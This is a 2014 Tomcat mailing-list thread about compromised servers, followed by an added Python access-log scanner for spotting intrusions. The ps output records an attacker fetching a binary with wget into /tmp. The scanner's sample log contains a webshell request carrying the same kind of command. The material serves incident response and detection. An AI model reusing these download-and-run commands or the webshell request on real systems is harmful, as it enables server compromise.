Hello Dan,

Nope, the attacker is executing locally the following:

tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid

And then it launches squid, which tries to connect via ssh to various places.

Right now it's time to leave the office, but in a few hours I will paste to pastebin the access logs, config files, whatever you tell me.

This is my pstree:

[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
     ├─atop
     ├─crond
     ├─dbus-daemon
     ├─events/0
     ├─events/1
     ├─events/2
     ├─events/3
     ├─httpd───8*[httpd]
     ├─irqbalance
     ├─2*[iscsid]
     ├─iscsiuio───3*[{iscsiuio}]
     ├─java─┬─sh───wget
     │      └─263*[{java}]
     ├─khelper

By the way, the log files are really big, 200 MB each one; I'll try to set up a Dropbox account so I can share them.

Thanks and regards

Regards.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>

2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dmik...@gopivotal.com>:

> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <lsantagost...@gmail.com> wrote:
>
> > Hello list,
> >
> > I'm facing an issue in 6 Tomcat servers that are getting penetrated and they
> > are executing malicious scripts on my server.
>
> Can you share more about what they are doing? It might give some clues as
> to how they are accessing your machines. For example, if they are
> deploying a WAR file to your server, it could mean that they have access to
> the Manager application on your server.
>
> Any details you can share might be helpful.
>
> > I'm using 7.0.53 on my servers. Running CentOS 5.8
> >
> > Let me know what information you need.
>
> Do you have an access log? If not, enable one. If the attacker is not
> deleting it, it could show you more about who they are and what requests
> they are executing to access your server. Assuming they are entering
> through your application and not some other way.
>
> Dan
>
> > PS: This is my first mail to this list, so I apologize for this not
> > gentle presentation.
> >
> > Regards.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
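Dan's advice in the quoted reply is to enable an access log and look for signs that the attacker reaches the Manager application. The following is an added example, not code from the thread or from the Tomcat project, showing what such a log review could look like: a small Python scanner for the default AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b) that flags requests to the Manager/Host Manager applications and URLs carrying command-like text, such as the wget-to-/tmp fetch visible in the ps output above. The log lines, the client address 203.0.113.7, the download host 198.51.100.9 and the /x/cmd.jsp path are constructed sample data, not real log entries from Leonardo's servers.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Regex for the Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Paths that reach the Manager / Host Manager applications.
ADMIN_PREFIXES = ("/manager/", "/host-manager/")

# Tokens that suggest an OS command is being passed through a request
# (the thread shows a dropped script fetching a binary with wget into /tmp).
# ".sh" can also match ordinary paths such as ".shtml"; treat hits as leads, not proof.
COMMAND_TOKENS = ("wget ", "curl ", "/tmp/", ".sh", "chmod ", "/bin/sh")

# Constructed sample log, not data from the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Apr/2014:09:12:01 -0300] "GET /app/index.jsp HTTP/1.1" 200 5120
203.0.113.7 - - [27/Apr/2014:09:13:44 -0300] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - tomcat [27/Apr/2014:09:13:50 -0300] "GET /manager/html HTTP/1.1" 200 17340
203.0.113.7 - tomcat [27/Apr/2014:09:14:12 -0300] "POST /manager/html/upload HTTP/1.1" 200 18012
203.0.113.7 - - [27/Apr/2014:09:14:30 -0300] "GET /x/cmd.jsp?c=wget%20http://198.51.100.9/.xy/squid32%20-O%20/tmp/squid HTTP/1.1" 200 312
10.0.0.5 - - [27/Apr/2014:09:15:02 -0300] "GET /app/logo.png HTTP/1.1" 304 -
"""


def parse_line(line):
    """Parse one access-log line; return a dict of fields, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # "%b" prints "-" when no body was sent.
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def flag_record(rec):
    """Return the list of reasons this request deserves a look (empty if none)."""
    reasons = []
    path = rec["path"]
    if path.startswith(ADMIN_PREFIXES):
        outcome = "succeeded" if rec["status"] < 400 else "denied (%d)" % rec["status"]
        reasons.append("manager app request %s %s, %s" % (rec["method"], path, outcome))
    # Decode %20 etc. so "wget%20http..." is inspected as "wget http..."
    decoded = unquote_plus(path).lower()
    hits = [t for t in COMMAND_TOKENS if t in decoded]
    if hits:
        reasons.append("command-like content in URL (%s)" % ", ".join(sorted(hits)))
    return reasons


def scan(log_text):
    """Scan raw log text; map each client host to the reasons it was flagged."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line (different pattern, truncated write); skip it
        for reason in flag_record(rec):
            findings[rec["host"]].append(reason)
    return dict(findings)


if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG).items():
        print(host)
        for reason in reasons:
            print("  -", reason)
```

Run against a real access log with `scan(open(path).read())`; a 401 on /manager/html followed by a 200 from the same address is the sort of sequence worth correlating with the timestamps of the sh /tmp/4.sh process, and the per-host grouping gives the addresses to look for in the firewall logs.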